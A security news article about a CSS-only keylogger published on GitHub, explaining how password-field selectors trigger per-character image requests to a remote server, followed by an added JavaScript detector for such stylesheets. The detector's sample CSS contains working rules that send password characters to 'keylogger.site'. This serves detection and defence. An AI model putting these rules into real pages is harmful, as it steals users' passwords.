A keylogger that abuses CSS to steal passwords has appeared


By Christoph Scholz

CSS specifies the style of a web page, such as font colors and which parts to use, but code that steals passwords using only CSS has been published on GitHub.

GitHub - maxchehab/CSS-Keylogging: Chrome extension and Express server that exploits keylogging abilities of CSS.
https://github.com/maxchehab/CSS-Keylogging


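The mechanism works as follows: each time a character is typed into the password field, the last character of the field is obtained, and an image corresponding to that character is downloaded from an external server. For example, if "a" is entered, the page accesses "http://keylogger.site/a". Because the external server keeps an access log, anyone who looks at that log can determine what password was entered.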


However, for the characters in the password field to be captured, the web page must be built with a specific framework such as "React". Among well-known sites, Facebook and Instagram fall into this category.

Note that there are reports concerning the case where a password is entered using a password manager or the browser's password-saving feature, but for the time being it seems better to refrain from applying untrusted CSS yourself with tools such as "Stylish".
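
A defensive check based on the mechanism described above, added here as an example (it is not code from the CSS-Keylogging repository): it scans a stylesheet for rules that select on an input's `value` attribute and load a remote URL, then groups the matched characters by host. The `[value$="…"]` selector shape, the function names and the sample stylesheet are assumptions constructed for illustration.

```javascript
// Added example: flag CSS rules that tie a remote fetch to an input's value.
// Assumption: such rules pair an attribute selector on `value` (e.g. [value$="a"])
// with a url(...) load, which matches the behaviour described in the article.
const VALUE_SELECTOR = /\[\s*value\s*[$^*~|]?=\s*["']?([^"'\]]*)["']?\s*\]/i;
const REMOTE_URL = /url\(\s*["']?((?:https?:)?\/\/[^"')\s]+)["']?\s*\)/gi;

// Constructed sample stylesheet (not taken from the linked repository).
const SAMPLE_CSS = `
/* benign theme rules */
body { background: url("/img/bg.png"); color: #222; }
input[type="text"] { border: 1px solid #ccc; }
input[type="password"][value$="a"] { background-image: url("http://keylogger.site/a"); }
@media screen {
  input[type="password"][value$="b"] { background-image: url("http://keylogger.site/b"); }
}
`;

// Returns one finding per rule whose selector matches on `value` and whose
// declarations load a resource from a remote origin.
function findValueExfilRules(css) {
  const text = css.replace(/\/\*[\s\S]*?\*\//g, ""); // drop comments
  const rule = /([^{}]+)\{([^{}]*)\}/g; // innermost "selector { body }" pairs
  const findings = [];
  let m;
  while ((m = rule.exec(text)) !== null) {
    const selector = m[1].trim();
    const sel = VALUE_SELECTOR.exec(selector);
    if (!sel) continue;
    const urls = [...m[2].matchAll(REMOTE_URL)].map((u) => u[1]);
    if (urls.length === 0) continue;
    findings.push({ selector, matched: sel[1], urls });
  }
  return findings;
}

// Groups the matched value fragments by remote host; one host receiving many
// distinct single characters is the pattern worth reviewing.
function charsetByHost(findings) {
  const byHost = {};
  for (const f of findings) {
    for (const u of f.urls) {
      const host = new URL(u, "http://base.invalid").host;
      byHost[host] = byHost[host] || new Set();
      byHost[host].add(f.matched);
    }
  }
  return byHost;
}
```

This is a text heuristic, not a CSS parser: braces inside quoted strings or `@import`ed sheets are not handled, so treat an empty result as "nothing obvious" rather than proof that a stylesheet is safe.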

in Security, Posted by log1d_ts